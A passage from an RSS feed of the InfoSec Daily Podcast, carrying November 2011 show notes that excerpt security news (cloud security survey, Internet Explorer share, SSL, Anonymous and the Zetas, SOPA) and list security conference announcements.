<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.crn.com/news/cloud/231902104/cloud-security-firewall-concerns-create-channel-opportunities-study.htm"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.crn.com/news/cloud/231902104/cloud-security-firewall-concerns-create-channel-opportunities-study.htm</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230; The findings, said Larry Ponemon, CEO of the Ponemon Institute, are startling as they illustrate a lack of understanding around key cloud security needs.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It tells me that we have a big problem out here,&quot; he said.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Equally jarring, Ponemon said, is the lack of certainty in organizations around who is responsible for cloud security and for ensuring cloud environments are locked down. According to Ponemon, organizations believe their partners are responsible for their cloud security, with 36 percent of respondents saying their partner or provider should secure their clouds. Meanwhile, 31 percent of organizations said it is their own responsibility to ensure the cloud is secure, while the remaining 33 percent said it is both the organizations&#39; and their providers&#39; duty to provide secure cloud computing environments.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is also a strong divide within organizations over which internal personnel handles cloud security. According to Ponemon, 41 percent of respondents said the onus is on IT operations. The remaining respondents said cloud security is the job of the IT security team, the data center crew or that it is a managed service&#8230;.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://arstechnica.com/microsoft/news/2011/11/the-end-of-an-era-internet-explorer-drops-below-50-percent-of-web-usage.ars"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/microsoft/news/2011/11/the-end-of-an-era-internet-explorer-drops-below-50-percent-of-web-usage.ars</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A couple of interesting things happened in the world of Web browser usage during October. The more significant one is that Internet Explorer&#39;s share of global browser usage dropped below 50 percent for the first time in more than a decade. Less significant, but also notable, is that Chrome for the first time overtook Firefox here at Ars, making it the technologist&#39;s browser of choice.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Internet Explorer still retains a majority of the desktop browser market share, at 52.63 percent, a substantial 1.76 point drop from September. However, desktop browsing makes up only about 94 percent of Web traffic; the rest comes from phones and tablets, both markets in which Internet Explorer is all but unrepresented. As a share of the whole browser market, Internet Explorer has only 49.58 percent of users. Microsoft&#39;s browser first achieved a majority share in&mdash;depending on which numbers you look at&mdash;1998 or 1999. It reached its peak of about 95 percent share in 2004, and has been declining ever since&#8230;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="https://www.infosecisland.com/security-videos-view/17782-Hacker-Halted-Moxie-Marlinspike-on-SSL-Authenticity.html"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.infosecisland.com/security-videos-view/17782-Hacker-Halted-Moxie-Marlinspike-on-SSL-Authenticity.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;SSL And The Future Of Authenticity: In the early 90&#39;s, at the dawn of the World Wide Web, some engineers at Netscape developed a protocol for making secure HTTP requests, and what they came up with was called SSL. Given the relatively scarce body of knowledge concerning secure protocols at the time, as well the intense pressure that everyone at Netscape was working under, their efforts can only be seen as incredibly heroic. But while it&#39;s amazing that SSL has endured for as long as it has, some parts of it &#8212; particularly those concerning Certificate Authorities &#8212; have always caused some friction, and have more recently started to cause real problems.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This talk will provide an in-depth examination of the current problems with authenticity in SSL, discuss some of the recent high-profile SSL infrastructure attacks in detail, and cover some strategies to definitively fix the disintegrating trust relationships at the core of this fundamental protocol.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://news.softpedia.com/news/Anonymous-Mexico-Denies-Attack-On-Drug-Cartel-231817.shtml"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Anonymous-Mexico-Denies-Attack-On-Drug-Cartel-231817.shtml</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Mexican faction of the hacktivist group denied any implications in the video that was recently launched in which they threatened the Zetas criminal organization.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Mexican newspaper</span><a href="http://www.milenio.com/cdb/doc/noticias2011/d66c3c523c60b03240b8c4d4c4d79de4"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Milenio</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, two of the members of Anonymous, Skill3r and Glyniss Paroubek, came forward and made a statement in which they claim that the video released earlier</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">wasn&#39;t coming from them.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It&#39;s very easy to make a video on behalf of Anonymous and launch air threats, but to think, plan and evaluate the pros and cons is another story,&quot; reads the translation of their statement.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When asked about what they have planned for the future, they revealed that they will continue other operations, but for now they hope to make it clear that the cartel operation is false.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another statement from the hacktivists wants to make sure everyone gets the message.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Dear followers and supporters of this page (Anonymous). I hereby disclaim Mexico Anonymous entirely of the responsibility of the news of hacking a page that is allegedly linked to the Zetas cartel.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This comes after someone claiming to be part of Anonymous decided to retaliate against the cartel for kidnapping one of their members during a street protest. At the time, many voices raised concerns about the implications of such a hacking operation.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many feared that the Zetas will retaliate especially considering the fact that recently, 35 of their members were killed, their bodies being dumped on a highway.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It remains unclear if Anonymous just wants to clear its name to make sure no one will get hurt or in fact it wasn&#39;t them that launched the threats against the Zetas. Whichever the situation, it&#39;s probably the best to call off the operation as who knows how many innocent bloggers would have suffered.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-511-sopa-coppa-security-delegation-ie-decline-convergence-anonymous/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3064/0/infosec-daily-podcast-episode-511.mp3" length="19569202" type="audio/mpeg" />
		<itunes:duration>0:40:43</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 511 for November 3, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith theNurse and his stroke at Hacker Halted:
	We all know an[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 511 for November 3, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith theNurse and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info
	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	Cost = FREE
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://news.cnet.com/8301-31921_3-20128166-281/copyright-bill-controversy-grows-as-rhetoric-sharpens/
	The Stop Online Piracy Act, or SOPA, introduced last week in the House of Representatives to the applause of lobbyists for Hollywood and other large content holders, is designed to make allegedly copyright-infringing Web sites, sometimes called &#34;rogue&#34; Web sites, virtually disappear from the Internet.
	That goes too far and hinders freedom of speech and innovation, the Consumer Electronics Association, NetCoalition, and the Computer and Communications Industry Association trade groups said in a letter sent today to House members. SOPA could &#34;constrain economic growth and threaten a vital sector of the U.S. economy and a major source of global competitiveness,&#34; it warned.
	Content owners responded a few hours later by publicizing a pair of letters of their own from the National Fraternal Order of Police and the International Association of Fire Fighters. The firefighters&#39; letter was actually written in September and was endorsing a similar-but-not-quite-the-same Senate bill, but its message was unmistakable: &#34;Legislation targeting these foreign rogue Web sites will encourage Internet users to find legitimate sources for goods and content (and) will ensure that counterfeiters and pirates can no longer profit from this clearly illegal activity.&#34;

	Source: http://news.cnet.com/8301-19518_3-20127633-238/survey-many-parents-help-kids-lie-to-get-on-facebook
	In 1998, Congress passed the Children&#39;s Online Privacy Protection Act (COPPA) that requires Web sites to &#34;obtain verifiable parental consent&#34; before collecting personal information from children under 13.
	This very well-intentioned law[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 510 &#8211; Special Guest Marcus J. Carey (@threatagent), Tod Beardsley (@todb), and Jonathan Cran (@jcran) from Rapid7/Metaploit</title>
		<link>http://www.isdpodcast.com/episode-510-special-guest-marcus-j-carey-threatagent-tod-beardsley-todb-and-jonathan-cran-jcran-from-rapid7metaploit</link>
		<comments>http://www.isdpodcast.com/episode-510-special-guest-marcus-j-carey-threatagent-tod-beardsley-todb-and-jonathan-cran-jcran-from-rapid7metaploit#comments</comments>
		<pubDate>Thu, 03 Nov 2011 00:53:39 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3061</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 510 for November 2, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes,Boris Sverdlik, Karthik Rangarajan, Keith Pachulski and Varun Sharma. Announcements: Brad Smith theNurse and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 510 for November 2, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes,Boris Sverdlik, Karthik Rangarajan, Keith Pachulski and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith theNurse and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost = FREE</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight we&rsquo;re joined by Marcus J. Carey (@ifail), Tod Beardsley, and Jonathan Cran (@jcran) from the </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rapid7/Metasploit team. &nbsp;Discussing some upcoming features and the Metasploit project.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-510-special-guest-marcus-j-carey-threatagent-tod-beardsley-todb-and-jonathan-cran-jcran-from-rapid7metaploit/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3061/0/infosec-daily-podcast-episode-510.mp3" length="16038283" type="audio/mpeg" />
		<itunes:duration>0:00:01</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 510 for November 2, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes,Boris Sverdlik, Karthik Rangarajan, Keith Pachulski and Varun Sharma.
	Announcements:
	Brad Smith theNurse and his stroke at Hacker Halted:
	[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 510 for November 2, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes,Boris Sverdlik, Karthik Rangarajan, Keith Pachulski and Varun Sharma.
	Announcements:
	Brad Smith theNurse and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info
	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	Cost = FREE
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.

	Tonight we&#8217;re joined by Marcus J. Carey (@ifail), Tod Beardsley, and Jonathan Cran (@jcran) from the Rapid7/Metasploit team. &#160;Discussing some upcoming features and the Metasploit project.</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 509 &#8211; EtterCap is back!, DODroid, Patriot Act’s 10th Year, th3j35t3r Keynote, FB Fix &amp; Gmail iOS</title>
		<link>http://www.isdpodcast.com/episode-509-ettercap-is-back-dodroid-patriot-act%e2%80%99s-10th-year-th3j35t3r-keynote-fb-fix-gmail-ios</link>
